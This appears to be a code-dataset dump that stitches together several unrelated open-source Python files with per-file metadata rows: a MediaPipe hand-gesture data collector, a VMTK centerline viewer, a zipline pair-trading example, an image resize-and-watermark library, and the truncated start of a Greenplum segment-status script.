mp_drawing = mp.solutions.drawing_utils #웹캠에서 손가락 뼈마디 부분을 그리는 것
hands = mp_hands.Hands(max_num_hands = 1, min_detection_confidence = 0.5, min_tracking_confidence = 0.5) #모드 세팅
#Gesture recognition model
file = np.genfromtxt('gesture_trained.csv', delimiter=',') #csv 파일 받아와서 필요한 정보 뽑기 / 경로 주의!
cam = cv2.VideoCapture(0) #캠켜기
def click(event, x, y, flags, param): #클릭 함수
global data, file
if event == cv2.EVENT_LBUTTONDOWN: #마우스 왼쪽 누를 시
file = np.vstack((file, data)) #기존 파일에 새로운 데이터 추가
print(file.shape) #행렬 펼치기
cv2.namedWindow('Hand Cam') #? / 윈도우 이름이 아래 imshow()의 이름과 같아야함
cv2.setMouseCallback('Hand Cam', click) #클릭 시..
while cam.isOpened(): #카메라가 열려있으면..
success, image = cam.read() #한 프레임 씩 읽어옴
if not success: #success 못하면 다음 프레임으로..?
continue
#success하면 go
image = cv2.cvtColor(cv2.flip(image, 1), cv2.COLOR_BGR2RGB) #이미지 전처리(색상 형식 변경 & 이미지 한번 뒤집기)
results = hands.process(image) #전처리 및 모델 추론을 함께 실행..
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) #출력을 위해 다시 색상 형식 바꿔주기
if results.multi_hand_landmarks: #위 전처리를 통해 손이 인식 되면 참이됨
for hand_landmarks in results.multi_hand_landmarks: #손 여러개 대비?? 예외처리 방지? with 써야되나?
joint = np.zeros((21, 3)) #joint -> 빨간 점. 포인트 21개, xyz 3개. 생성
for j, lm in enumerate(hand_landmarks.landmark):
joint[j] = [lm.x, lm.y, lm.z] #값 입력
#joint 인덱스끼리 빼줘서 뼈대의 벡터 구하기(Fig 3의 형태)
v1 = joint[[0,1,2,3,0,5,6,7,0,9,10,11,0,13,14,15,0,17,18,19],:] # Parent joint
v2 = joint[[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],:] # Child joint
v = v2 - v1 # [20,3]
#벡터의 길이로.. Normalize v?
v = v / np.linalg.norm(v, axis=1)[:, np.newaxis]
# Get angle using arcos of dot product
angle = np.arccos(np.einsum('nt,nt->n',
v[[0,1,2,4,5,6,8,9,10,12,13,14,16,17,18],:],
v[[1,2,3,5,6,7,9,10,11,13,14,15,17,18,19],:])) # [15,]
angle = np.degrees(angle) # Convert radian to degree
# Inference gesture / 데이터 바꿔주고 정리..
data = np.array([angle], dtype=np.float32)
data = np.append(data, 14) #ㅇㅇ번 인덱스의 손모양 데이터 추가
# print(data)
mp_drawing.draw_landmarks(image, hand_landmarks, mp_hands.HAND_CONNECTIONS) #마디마디에 그려주는
cv2.imshow('Hand Cam', image) #윈도우 열기
if cv2.waitKey(1) == ord('q'):
break
np.savetxt('gesture_trained.csv', file, delimiter=',') #추가된 데이터 파일 저장
| 38.987654 | 112 | 0.579164 |
import cv2
import mediapipe as mp
import numpy as np
gesture = {
0:'fist', 1:'one', 2:'two', 3:'three', 4:'four', 5:'five',
6:'six', 7:'rock', 8:'spiderman', 9:'yeah', 10:'ok'
}
hand_gesture = {
0:'fist', 1:'one', 2:'gun', 3:'three', 4:'four', 5:'five',
6:'promise', 7:'spiderman', 8:'niconiconi', 9:'two', 10:'ok',
11:'claws', 12:'good', 13:'fanxyChild', 14:'dog'
}
mp_hands = mp.solutions.hands
mp_drawing = mp.solutions.drawing_utils
hands = mp_hands.Hands(max_num_hands = 1, min_detection_confidence = 0.5, min_tracking_confidence = 0.5)
file = np.genfromtxt('gesture_trained.csv', delimiter=',')
cam = cv2.VideoCapture(0)
def click(event, x, y, flags, param):
global data, file
if event == cv2.EVENT_LBUTTONDOWN:
file = np.vstack((file, data))
print(file.shape)
cv2.namedWindow('Hand Cam')
cv2.setMouseCallback('Hand Cam', click)
while cam.isOpened():
success, image = cam.read()
if not success:
continue
image = cv2.cvtColor(cv2.flip(image, 1), cv2.COLOR_BGR2RGB)
results = hands.process(image)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
if results.multi_hand_landmarks:
for hand_landmarks in results.multi_hand_landmarks:
joint = np.zeros((21, 3))
for j, lm in enumerate(hand_landmarks.landmark):
joint[j] = [lm.x, lm.y, lm.z]
v1 = joint[[0,1,2,3,0,5,6,7,0,9,10,11,0,13,14,15,0,17,18,19],:]
v2 = joint[[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],:]
v = v2 - v1
v = v / np.linalg.norm(v, axis=1)[:, np.newaxis]
angle = np.arccos(np.einsum('nt,nt->n',
v[[0,1,2,4,5,6,8,9,10,12,13,14,16,17,18],:],
v[[1,2,3,5,6,7,9,10,11,13,14,15,17,18,19],:]))
angle = np.degrees(angle)
data = np.array([angle], dtype=np.float32)
data = np.append(data, 14)
mp_drawing.draw_landmarks(image, hand_landmarks, mp_hands.HAND_CONNECTIONS)
cv2.imshow('Hand Cam', image)
if cv2.waitKey(1) == ord('q'):
break
np.savetxt('gesture_trained.csv', file, delimiter=',')
| true | true |
f7fa35ee8fa6810fbc106dfbee55183269fe9b24 | 7,383 | py | Python | vmtkScripts/vmtkcenterlineviewer.py | daron1337/vmtk | df401c88959ccf758b1bc6353786600473187683 | [
"Apache-2.0"
] | 3 | 2016-02-26T17:30:04.000Z | 2017-11-09T03:24:04.000Z | vmtkScripts/vmtkcenterlineviewer.py | ElenaFagg/vmtk | 5c90b786afae3b2d84c79df593e648ada26402e3 | [
"Apache-2.0"
] | null | null | null | vmtkScripts/vmtkcenterlineviewer.py | ElenaFagg/vmtk | 5c90b786afae3b2d84c79df593e648ada26402e3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
## Program: VMTK
## Module: $RCSfile: vmtkcenterlineviewer.py,v $
## Language: Python
## Date: $Date: 2006/05/26 12:35:13 $
## Version: $Revision: 1.3 $
## Copyright (c) Luca Antiga, David Steinman. All rights reserved.
## See LICENCE file for details.
## This software is distributed WITHOUT ANY WARRANTY; without even
## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
## PURPOSE. See the above copyright notices for more information.
import vtk
import sys
import vtkvmtk
import vmtkrenderer
import pypes
vmtkcenterlineviewer = 'vmtkCenterlineViewer'
class vmtkCenterlineViewer(pypes.pypeScript):
def __init__(self):
pypes.pypeScript.__init__(self)
self.Centerlines = None
self.PointDataArrayName = ''
self.CellDataArrayName = ''
self.Display = 1
self.Legend = 1
self.ColorMap = 'cooltowarm'
self.NumberOfColors = 256
self.vmtkRenderer = None
self.OwnRenderer = 0
self.SetScriptName('vmtkcenterlineviewer')
self.SetScriptDoc('')
self.SetInputMembers([
['Centerlines','i','vtkPolyData',1,'','the input surface','vmtksurfacereader'],
['PointDataArrayName','pointarray','str',1,''],
['CellDataArrayName','cellarray','str',1,''],
['Legend','legend','bool',1,''],
['ColorMap','colormap','str',1,'["rainbow","blackbody","cooltowarm","grayscale"]','choose the color map'],
['NumberOfColors','numberofcolors','int',1,'','number of colors in the color map'],
['vmtkRenderer','renderer','vmtkRenderer',1,'','external renderer']])
self.SetOutputMembers([
['Centerlines','o','vtkPolyData',1,'','the output centerlines','vmtksurfacewriter']])
def Execute(self):
if not self.Centerlines:
self.PrintError('Error: No input centerlines.')
return
if not self.vmtkRenderer:
self.vmtkRenderer = vmtkrenderer.vmtkRenderer()
self.vmtkRenderer.Initialize()
self.OwnRenderer = 1
self.vmtkRenderer.RegisterScript(self)
if self.CellDataArrayName:
cellCenters = vtk.vtkCellCenters()
cellCenters.SetInputData(self.Centerlines)
cellCenters.Update()
cellCenters.GetOutput().GetPointData().SetActiveScalars(self.CellDataArrayName)
labelsMapper = vtk.vtkLabeledDataMapper();
labelsMapper.SetInputConnection(cellCenters.GetOutputPort())
labelsMapper.SetLabelModeToLabelScalars()
labelsActor = vtk.vtkActor2D()
labelsActor.SetMapper(labelsMapper)
self.vmtkRenderer.Renderer.AddActor(labelsActor)
centerlineMapper = vtk.vtkPolyDataMapper()
centerlineMapper.SetInputData(self.Centerlines)
if self.CellDataArrayName and not self.PointDataArrayName:
centerlineMapper.ScalarVisibilityOn()
centerlineMapper.SetScalarModeToUseCellData()
self.Centerlines.GetCellData().SetActiveScalars(self.CellDataArrayName)
centerlineMapper.SetScalarRange(self.Centerlines.GetCellData().GetScalars().GetRange(0))
elif self.PointDataArrayName:
centerlineMapper.ScalarVisibilityOn()
centerlineMapper.SetScalarModeToUsePointData()
self.Centerlines.GetPointData().SetActiveScalars(self.PointDataArrayName)
centerlineMapper.SetScalarRange(self.Centerlines.GetPointData().GetScalars().GetRange(0))
else:
centerlineMapper.ScalarVisibilityOff()
if self.ColorMap == 'grayscale':
lut = centerlineMapper.GetLookupTable()
lut.SetNumberOfTableValues(self.NumberOfColors)
lut.SetValueRange(0.0,1.0)
lut.SetSaturationRange(0.0,0.0)
lut.Build()
centerlineMapper.SetLookupTable(lut)
if self.ColorMap == 'rainbow':
lut = centerlineMapper.GetLookupTable()
lut.SetHueRange(0.666667,0.0)
lut.SetSaturationRange(0.75,0.75)
lut.SetValueRange(1.0,1.0)
lut.SetAlphaRange(1.0,1.0)
lut.SetNumberOfColors(self.NumberOfColors)
lut.Build()
centerlineMapper.SetLookupTable(lut)
if self.ColorMap == 'blackbody':
lut = centerlineMapper.GetLookupTable()
lut.SetNumberOfTableValues(self.NumberOfColors)
colorTransferFunction = vtk.vtkColorTransferFunction()
colorTransferFunction.SetColorSpaceToRGB()
colorTransferFunction.AddRGBPoint(0,0.0,0.0,0.0)
colorTransferFunction.AddRGBPoint(0.4,0.901961,0.0,0.0)
colorTransferFunction.AddRGBPoint(0.8,0.901961,0.901961,0.0)
colorTransferFunction.AddRGBPoint(1.0,1.0,1.0,1.0)
for ii,ss in enumerate([float(xx)/float(self.NumberOfColors) for xx in range(self.NumberOfColors)]):
cc = colorTransferFunction.GetColor(ss)
lut.SetTableValue(ii,cc[0],cc[1],cc[2],1.0)
lut.Build()
centerlineMapper.SetLookupTable(lut)
if self.ColorMap == 'cooltowarm':
lut = centerlineMapper.GetLookupTable()
lut.SetNumberOfTableValues(self.NumberOfColors)
colorTransferFunction = vtk.vtkColorTransferFunction()
colorTransferFunction.SetColorSpaceToDiverging()
colorTransferFunction.AddRGBPoint(0,0.231373,0.298039,0.752941)
colorTransferFunction.AddRGBPoint(0.5,0.865003,0.865003,0.865003)
colorTransferFunction.AddRGBPoint(1.0,0.705882,0.0156863,0.14902)
for ii,ss in enumerate([float(xx)/float(self.NumberOfColors) for xx in range(self.NumberOfColors)]):
cc = colorTransferFunction.GetColor(ss)
lut.SetTableValue(ii,cc[0],cc[1],cc[2],1.0)
lut.Build()
centerlineMapper.SetLookupTable(lut)
centerlineActor = vtk.vtkActor()
centerlineActor.SetMapper(centerlineMapper)
self.vmtkRenderer.Renderer.AddActor(centerlineActor)
scalarBarActor = None
if self.Legend and centerlineActor and self.PointDataArrayName:
scalarBarActor = vtk.vtkScalarBarActor()
scalarBarActor.SetLookupTable(centerlineActor.GetMapper().GetLookupTable())
scalarBarActor.GetLabelTextProperty().ItalicOff()
scalarBarActor.GetLabelTextProperty().BoldOff()
scalarBarActor.GetLabelTextProperty().ShadowOff()
scalarBarActor.SetLabelFormat('%.2f')
scalarBarActor.SetTitle(self.PointDataArrayName)
self.vmtkRenderer.Renderer.AddActor(scalarBarActor)
if self.Display:
self.vmtkRenderer.Render()
if self.OwnRenderer:
self.vmtkRenderer.Deallocate()
# if self.CellDataArrayName:
# self.vmtkRenderer.Renderer.RemoveActor(labelsActor)
#
# if self.Legend and centerlineActor:
# self.vmtkRenderer.Renderer.RemoveActor(scalarBarActor)
#
# self.vmtkRenderer.Renderer.RemoveActor(centerlineActor)
if __name__=='__main__':
main = pypes.pypeMain()
main.Arguments = sys.argv
main.Execute()
| 41.477528 | 118 | 0.646214 |
= 256
self.vmtkRenderer = None
self.OwnRenderer = 0
self.SetScriptName('vmtkcenterlineviewer')
self.SetScriptDoc('')
self.SetInputMembers([
['Centerlines','i','vtkPolyData',1,'','the input surface','vmtksurfacereader'],
['PointDataArrayName','pointarray','str',1,''],
['CellDataArrayName','cellarray','str',1,''],
['Legend','legend','bool',1,''],
['ColorMap','colormap','str',1,'["rainbow","blackbody","cooltowarm","grayscale"]','choose the color map'],
['NumberOfColors','numberofcolors','int',1,'','number of colors in the color map'],
['vmtkRenderer','renderer','vmtkRenderer',1,'','external renderer']])
self.SetOutputMembers([
['Centerlines','o','vtkPolyData',1,'','the output centerlines','vmtksurfacewriter']])
def Execute(self):
if not self.Centerlines:
self.PrintError('Error: No input centerlines.')
return
if not self.vmtkRenderer:
self.vmtkRenderer = vmtkrenderer.vmtkRenderer()
self.vmtkRenderer.Initialize()
self.OwnRenderer = 1
self.vmtkRenderer.RegisterScript(self)
if self.CellDataArrayName:
cellCenters = vtk.vtkCellCenters()
cellCenters.SetInputData(self.Centerlines)
cellCenters.Update()
cellCenters.GetOutput().GetPointData().SetActiveScalars(self.CellDataArrayName)
labelsMapper = vtk.vtkLabeledDataMapper();
labelsMapper.SetInputConnection(cellCenters.GetOutputPort())
labelsMapper.SetLabelModeToLabelScalars()
labelsActor = vtk.vtkActor2D()
labelsActor.SetMapper(labelsMapper)
self.vmtkRenderer.Renderer.AddActor(labelsActor)
centerlineMapper = vtk.vtkPolyDataMapper()
centerlineMapper.SetInputData(self.Centerlines)
if self.CellDataArrayName and not self.PointDataArrayName:
centerlineMapper.ScalarVisibilityOn()
centerlineMapper.SetScalarModeToUseCellData()
self.Centerlines.GetCellData().SetActiveScalars(self.CellDataArrayName)
centerlineMapper.SetScalarRange(self.Centerlines.GetCellData().GetScalars().GetRange(0))
elif self.PointDataArrayName:
centerlineMapper.ScalarVisibilityOn()
centerlineMapper.SetScalarModeToUsePointData()
self.Centerlines.GetPointData().SetActiveScalars(self.PointDataArrayName)
centerlineMapper.SetScalarRange(self.Centerlines.GetPointData().GetScalars().GetRange(0))
else:
centerlineMapper.ScalarVisibilityOff()
if self.ColorMap == 'grayscale':
lut = centerlineMapper.GetLookupTable()
lut.SetNumberOfTableValues(self.NumberOfColors)
lut.SetValueRange(0.0,1.0)
lut.SetSaturationRange(0.0,0.0)
lut.Build()
centerlineMapper.SetLookupTable(lut)
if self.ColorMap == 'rainbow':
lut = centerlineMapper.GetLookupTable()
lut.SetHueRange(0.666667,0.0)
lut.SetSaturationRange(0.75,0.75)
lut.SetValueRange(1.0,1.0)
lut.SetAlphaRange(1.0,1.0)
lut.SetNumberOfColors(self.NumberOfColors)
lut.Build()
centerlineMapper.SetLookupTable(lut)
if self.ColorMap == 'blackbody':
lut = centerlineMapper.GetLookupTable()
lut.SetNumberOfTableValues(self.NumberOfColors)
colorTransferFunction = vtk.vtkColorTransferFunction()
colorTransferFunction.SetColorSpaceToRGB()
colorTransferFunction.AddRGBPoint(0,0.0,0.0,0.0)
colorTransferFunction.AddRGBPoint(0.4,0.901961,0.0,0.0)
colorTransferFunction.AddRGBPoint(0.8,0.901961,0.901961,0.0)
colorTransferFunction.AddRGBPoint(1.0,1.0,1.0,1.0)
for ii,ss in enumerate([float(xx)/float(self.NumberOfColors) for xx in range(self.NumberOfColors)]):
cc = colorTransferFunction.GetColor(ss)
lut.SetTableValue(ii,cc[0],cc[1],cc[2],1.0)
lut.Build()
centerlineMapper.SetLookupTable(lut)
if self.ColorMap == 'cooltowarm':
lut = centerlineMapper.GetLookupTable()
lut.SetNumberOfTableValues(self.NumberOfColors)
colorTransferFunction = vtk.vtkColorTransferFunction()
colorTransferFunction.SetColorSpaceToDiverging()
colorTransferFunction.AddRGBPoint(0,0.231373,0.298039,0.752941)
colorTransferFunction.AddRGBPoint(0.5,0.865003,0.865003,0.865003)
colorTransferFunction.AddRGBPoint(1.0,0.705882,0.0156863,0.14902)
for ii,ss in enumerate([float(xx)/float(self.NumberOfColors) for xx in range(self.NumberOfColors)]):
cc = colorTransferFunction.GetColor(ss)
lut.SetTableValue(ii,cc[0],cc[1],cc[2],1.0)
lut.Build()
centerlineMapper.SetLookupTable(lut)
centerlineActor = vtk.vtkActor()
centerlineActor.SetMapper(centerlineMapper)
self.vmtkRenderer.Renderer.AddActor(centerlineActor)
scalarBarActor = None
if self.Legend and centerlineActor and self.PointDataArrayName:
scalarBarActor = vtk.vtkScalarBarActor()
scalarBarActor.SetLookupTable(centerlineActor.GetMapper().GetLookupTable())
scalarBarActor.GetLabelTextProperty().ItalicOff()
scalarBarActor.GetLabelTextProperty().BoldOff()
scalarBarActor.GetLabelTextProperty().ShadowOff()
scalarBarActor.SetLabelFormat('%.2f')
scalarBarActor.SetTitle(self.PointDataArrayName)
self.vmtkRenderer.Renderer.AddActor(scalarBarActor)
if self.Display:
self.vmtkRenderer.Render()
if self.OwnRenderer:
self.vmtkRenderer.Deallocate()
if __name__=='__main__':
main = pypes.pypeMain()
main.Arguments = sys.argv
main.Execute()
| false | true |
f7fa36c0be2d9710696527fe65ebe65716568d3b | 5,713 | py | Python | zipline/examples/pairtrade.py | colin1alexander/zipline | ba42e6d8b972dcce9271526562ceff0cddd3fa30 | [
"Apache-2.0"
] | null | null | null | zipline/examples/pairtrade.py | colin1alexander/zipline | ba42e6d8b972dcce9271526562ceff0cddd3fa30 | [
"Apache-2.0"
] | null | null | null | zipline/examples/pairtrade.py | colin1alexander/zipline | ba42e6d8b972dcce9271526562ceff0cddd3fa30 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logbook
import matplotlib.pyplot as plt
import numpy as np
import statsmodels.api as sm
from datetime import datetime
import pytz
from zipline.algorithm import TradingAlgorithm
from zipline.transforms import batch_transform
from zipline.utils.factory import load_from_yahoo
from zipline.api import symbol
@batch_transform
def ols_transform(data, sid1, sid2):
"""Computes regression coefficient (slope and intercept)
via Ordinary Least Squares between two SIDs.
"""
p0 = data.price[sid1].values
p1 = sm.add_constant(data.price[sid2].values, prepend=True)
slope, intercept = sm.OLS(p0, p1).fit().params
return slope, intercept
class Pairtrade(TradingAlgorithm):
"""Pairtrading relies on cointegration of two stocks.
The expectation is that once the two stocks drifted apart
(i.e. there is spread), they will eventually revert again. Thus,
if we short the upward drifting stock and long the downward
drifting stock (in short, we buy the spread) once the spread
widened we can sell the spread with profit once they converged
again. A nice property of this algorithm is that we enter the
market in a neutral position.
This specific algorithm tries to exploit the cointegration of
Pepsi and Coca Cola by estimating the correlation between the
two. Divergence of the spread is evaluated by z-scoring.
"""
def initialize(self, window_length=100):
self.spreads = []
self.invested = 0
self.window_length = window_length
self.ols_transform = ols_transform(refresh_period=self.window_length,
window_length=self.window_length)
self.PEP = self.symbol('PEP')
self.KO = self.symbol('KO')
def handle_data(self, data):
######################################################
# 1. Compute regression coefficients between PEP and KO
params = self.ols_transform.handle_data(data, self.PEP, self.KO)
if params is None:
return
intercept, slope = params
######################################################
# 2. Compute spread and zscore
zscore = self.compute_zscore(data, slope, intercept)
self.record(zscores=zscore,
PEP=data[symbol('PEP')].price,
KO=data[symbol('KO')].price)
######################################################
# 3. Place orders
self.place_orders(data, zscore)
def compute_zscore(self, data, slope, intercept):
"""1. Compute the spread given slope and intercept.
2. zscore the spread.
"""
spread = (data[self.PEP].price -
(slope * data[self.KO].price + intercept))
self.spreads.append(spread)
spread_wind = self.spreads[-self.window_length:]
zscore = (spread - np.mean(spread_wind)) / np.std(spread_wind)
return zscore
def place_orders(self, data, zscore):
"""Buy spread if zscore is > 2, sell if zscore < .5.
"""
if zscore >= 2.0 and not self.invested:
self.order(self.PEP, int(100 / data[self.PEP].price))
self.order(self.KO, -int(100 / data[self.KO].price))
self.invested = True
elif zscore <= -2.0 and not self.invested:
self.order(self.PEP, -int(100 / data[self.PEP].price))
self.order(self.KO, int(100 / data[self.KO].price))
self.invested = True
elif abs(zscore) < .5 and self.invested:
self.sell_spread()
self.invested = False
def sell_spread(self):
"""
decrease exposure, regardless of position long/short.
buy for a short position, sell for a long.
"""
ko_amount = self.portfolio.positions[self.KO].amount
self.order(self.KO, -1 * ko_amount)
pep_amount = self.portfolio.positions[self.PEP].amount
self.order(self.PEP, -1 * pep_amount)
# Note: this function can be removed if running
# this algorithm on quantopian.com
def analyze(context=None, results=None):
ax1 = plt.subplot(211)
plt.title('PepsiCo & Coca-Cola Co. share prices')
results[['PEP', 'KO']].plot(ax=ax1)
plt.ylabel('Price (USD)')
plt.setp(ax1.get_xticklabels(), visible=False)
ax2 = plt.subplot(212, sharex=ax1)
results.zscores.plot(ax=ax2, color='r')
plt.ylabel('Z-scored spread')
plt.gcf().set_size_inches(18, 8)
plt.show()
# Note: this if-block should be removed if running
# this algorithm on quantopian.com
if __name__ == '__main__':
logbook.StderrHandler().push_application()
# Set the simulation start and end dates.
start = datetime(2000, 1, 1, 0, 0, 0, 0, pytz.utc)
end = datetime(2002, 1, 1, 0, 0, 0, 0, pytz.utc)
# Load price data from yahoo.
data = load_from_yahoo(stocks=['PEP', 'KO'], indexes={},
start=start, end=end)
# Create and run the algorithm.
pairtrade = Pairtrade()
results = pairtrade.run(data)
# Plot the portfolio data.
analyze(results=results)
| 35.930818 | 77 | 0.636093 |
import logbook
import matplotlib.pyplot as plt
import numpy as np
import statsmodels.api as sm
from datetime import datetime
import pytz
from zipline.algorithm import TradingAlgorithm
from zipline.transforms import batch_transform
from zipline.utils.factory import load_from_yahoo
from zipline.api import symbol
@batch_transform
def ols_transform(data, sid1, sid2):
p0 = data.price[sid1].values
p1 = sm.add_constant(data.price[sid2].values, prepend=True)
slope, intercept = sm.OLS(p0, p1).fit().params
return slope, intercept
class Pairtrade(TradingAlgorithm):
def initialize(self, window_length=100):
self.spreads = []
self.invested = 0
self.window_length = window_length
self.ols_transform = ols_transform(refresh_period=self.window_length,
window_length=self.window_length)
self.PEP = self.symbol('PEP')
self.KO = self.symbol('KO')
def handle_data(self, data):
| true | true |
f7fa36e765b643cef087a41180e1be7f91ad584a | 3,522 | py | Python | aperturelib/__init__.py | Aperture-py/aperture-lib | 5c54af216319f297ddf96181a16f088cf1ba23f3 | [
"MIT"
] | null | null | null | aperturelib/__init__.py | Aperture-py/aperture-lib | 5c54af216319f297ddf96181a16f088cf1ba23f3 | [
"MIT"
] | 4 | 2021-03-18T20:57:02.000Z | 2021-09-08T00:06:56.000Z | aperturelib/__init__.py | Aperture-py/aperture-lib | 5c54af216319f297ddf96181a16f088cf1ba23f3 | [
"MIT"
] | null | null | null | ''' Aperturelib '''
# Supported formats may be found here: http://pillow.readthedocs.io/en/5.1.x/handbook/image-file-formats.html
SUPPORTED_EXTENSIONS = ('.jpg', '.jpeg', '.gif', '.png')
from PIL import Image
from .resize import resize_image as resize
from .watermark import watermark_image
from .watermark import watermark_text
def open(f):
'''Opens an instance of a PIL Image.
This is a wrapper for the PIL Image open function.
Args:
f: File path or File object.
Returns:
(PIL.Image) An instance of a PIL image.
'''
return Image.open(f)
def format_image(path, options):
'''Formats an image.
Args:
path (str): Path to the image file.
options (dict): Options to apply to the image.
Returns:
(list) A list of PIL images. The list will always be of length
1 unless resolutions for resizing are provided in the options.
'''
image = Image.open(path)
image_pipeline_results = __pipeline_image(image, options)
return image_pipeline_results
def save(image, out_file, **kwargs):
'''Saves an instance of a PIL Image to the system.
This is a wrapper for the PIL Image save function.
Args:
img: An instance of a PIL Image.
out_file: Path to save the image to.
**kwargs: Additonal save options supported by PIL.
(see https://pillow.readthedocs.io/en/5.1.x/handbook/image-file-formats.html)
'''
image.save(out_file, **kwargs)
# Internal Methods
# =========================
def __pipeline_image(image, options):
'''Sends an image through a processing pipeline.
Applies all (relevant) provided options to a given image.
Args:
image: An instance of a PIL Image.
options: Options to apply to the image (i.e. resolutions).
Returns:
A list containing instances of PIL Images. This list will always be length
1 if no options exist that require multiple copies to be created for a single
image (i.e resolutions).
'''
results = []
# Begin pipline
# 1. Create image copies for each resolution
if 'resolutions' in options:
resolutions = options['resolutions'] # List of resolution tuples
for res in resolutions:
img_rs = resize(image, res) # Resized image
# Add image to result set. This result set will be pulled from
# throughout the pipelining process to perform more processing (watermarking).
results.append(img_rs)
# 2. Apply watermark to each image copy
if 'wmark-img' in options:
wtrmk_path = options['wmark-img']
if wtrmk_path:
if len(results) == 0:
image = watermark_image(image, wtrmk_path) #watermark actual image?
else:
for i in range(0, len(results)):
results[i] = watermark_image(
results[i], wtrmk_path) #watermark actual image
if 'wmark-txt' in options:
wtrmk_txt = options['wmark-txt']
if wtrmk_txt:
if len(results) == 0:
image = watermark_text(image, wtrmk_txt) #watermark actual image?
else:
for i in range(0, len(results)):
results[i] = watermark_text(results[i],
wtrmk_txt) #watermark actual image
# Fallback: Nothing was done to the image
if len(results) == 0:
results.append(image)
return results | 32.018182 | 109 | 0.617547 |
SUPPORTED_EXTENSIONS = ('.jpg', '.jpeg', '.gif', '.png')
from PIL import Image
from .resize import resize_image as resize
from .watermark import watermark_image
from .watermark import watermark_text
def open(f):
return Image.open(f)
def format_image(path, options):
image = Image.open(path)
image_pipeline_results = __pipeline_image(image, options)
return image_pipeline_results
def save(image, out_file, **kwargs):
image.save(out_file, **kwargs)
def __pipeline_image(image, options):
results = []
if 'resolutions' in options:
resolutions = options['resolutions']
for res in resolutions:
img_rs = resize(image, res)
results.append(img_rs)
if 'wmark-img' in options:
wtrmk_path = options['wmark-img']
if wtrmk_path:
if len(results) == 0:
image = watermark_image(image, wtrmk_path)
else:
for i in range(0, len(results)):
results[i] = watermark_image(
results[i], wtrmk_path)
if 'wmark-txt' in options:
wtrmk_txt = options['wmark-txt']
if wtrmk_txt:
if len(results) == 0:
image = watermark_text(image, wtrmk_txt)
else:
for i in range(0, len(results)):
results[i] = watermark_text(results[i],
wtrmk_txt)
if len(results) == 0:
results.append(image)
return results | true | true |
f7fa374159192d68eb92a8a0ef092eaf359372ac | 164 | py | Python | Aula10 - Curso em Video/Exercicio_05.py | DheniMoura/Python_Curso-em-Video | 60a00a36a188ff8a305a3ab92450c9d75cb25aee | [
"MIT"
] | null | null | null | Aula10 - Curso em Video/Exercicio_05.py | DheniMoura/Python_Curso-em-Video | 60a00a36a188ff8a305a3ab92450c9d75cb25aee | [
"MIT"
] | null | null | null | Aula10 - Curso em Video/Exercicio_05.py | DheniMoura/Python_Curso-em-Video | 60a00a36a188ff8a305a3ab92450c9d75cb25aee | [
"MIT"
] | null | null | null | num = []
for i in range(0,3):
num.append(float(input('Digite um número: ')))
maior = max(num)
menor = min(num)
print('maior: ', maior)
print('menor: ', menor) | 18.222222 | 50 | 0.615854 | num = []
for i in range(0,3):
num.append(float(input('Digite um número: ')))
maior = max(num)
menor = min(num)
print('maior: ', maior)
print('menor: ', menor) | true | true |
f7fa37609a642250193991cca36aebd6128e5b13 | 8,105 | py | Python | gpMgmt/sbin/gpgetstatususingtransition.py | gridgentoo/gpdb | f3dc101a7b4fa3d392f79cc5146b20c83894eb19 | [
"PostgreSQL",
"Apache-2.0"
] | 9 | 2018-04-20T03:31:01.000Z | 2020-05-13T14:10:53.000Z | gpMgmt/sbin/gpgetstatususingtransition.py | gridgentoo/gpdb | f3dc101a7b4fa3d392f79cc5146b20c83894eb19 | [
"PostgreSQL",
"Apache-2.0"
] | 36 | 2017-09-21T09:12:27.000Z | 2020-06-17T16:40:48.000Z | gpMgmt/sbin/gpgetstatususingtransition.py | gridgentoo/gpdb | f3dc101a7b4fa3d392f79cc5146b20c83894eb19 | [
"PostgreSQL",
"Apache-2.0"
] | 32 | 2017-08-31T12:50:52.000Z | 2022-03-01T07:34:53.000Z | #!/usr/bin/env python
#
# Copyright (c) Greenplum Inc 2010. All Rights Reserved.
#
#
# THIS IMPORT MUST COME FIRST
# import mainUtils FIRST to get python version check
#
from gppylib.mainUtils import *
import os, sys
import pickle, base64
from optparse import Option, OptionGroup, OptionParser, OptionValueError
from gppylib.gpparseopts import OptParser, OptChecker
from gppylib import gplog, gparray, pgconf
from gppylib.commands import base, gp, pg, unix
from gppylib.db import dbconn
from gppylib.utils import parseKeyColonValueLines
logger = gplog.get_default_logger()
#
# todo: the file containing this should be renamed since it gets more status than just from transition
#
class GpSegStatusProgram:
"""
Program to fetch status from the a segment(s).
Multiple pieces of status information can be fetched in a single request by
passing in multiple status request options on the command line
"""
def __init__(self, options):
self.__options = options
self.__pool = None
def getPidStatus(self, seg, pidRunningStatus):
"""
returns a dict containing "pid" and "error" fields. Note that
the "error" field may be non-None even when pid is non-zero (pid if zero indicates
unable to determine the pid). This can happen if the pid is there in the
lock file but not active on the port.
The caller can rely on this to try to differentiate between an active pid and an inactive one
"""
lockFileExists = pidRunningStatus['lockFileExists']
netstatPortActive = pidRunningStatus['netstatPortActive']
pidValue = pidRunningStatus['pidValue']
lockFileName = gp.get_lockfile_name(seg.getSegmentPort())
error = None
if not lockFileExists and not netstatPortActive:
error = "No socket connection or lock file (%s) found for port %s" % (lockFileName, seg.getSegmentPort())
elif not lockFileExists and netstatPortActive:
error = "No lock file %s but process running on port %s" % (lockFileName, seg.getSegmentPort())
elif lockFileExists and not netstatPortActive:
error = "Have lock file %s but no process running on port %s" % (lockFileName, seg.getSegmentPort())
else:
if pidValue == 0:
error = "Have lock file and process is active, but did not get a pid value" # this could be an assert?
res = {}
res['pid'] = pidValue
res['error'] = error
return res
def getPidRunningStatus(self, seg):
"""
Get an object containing various information about the postmaster pid's status
"""
(postmasterPidFileExists, tempFileExists, lockFileExists, netstatPortActive, pidValue) = \
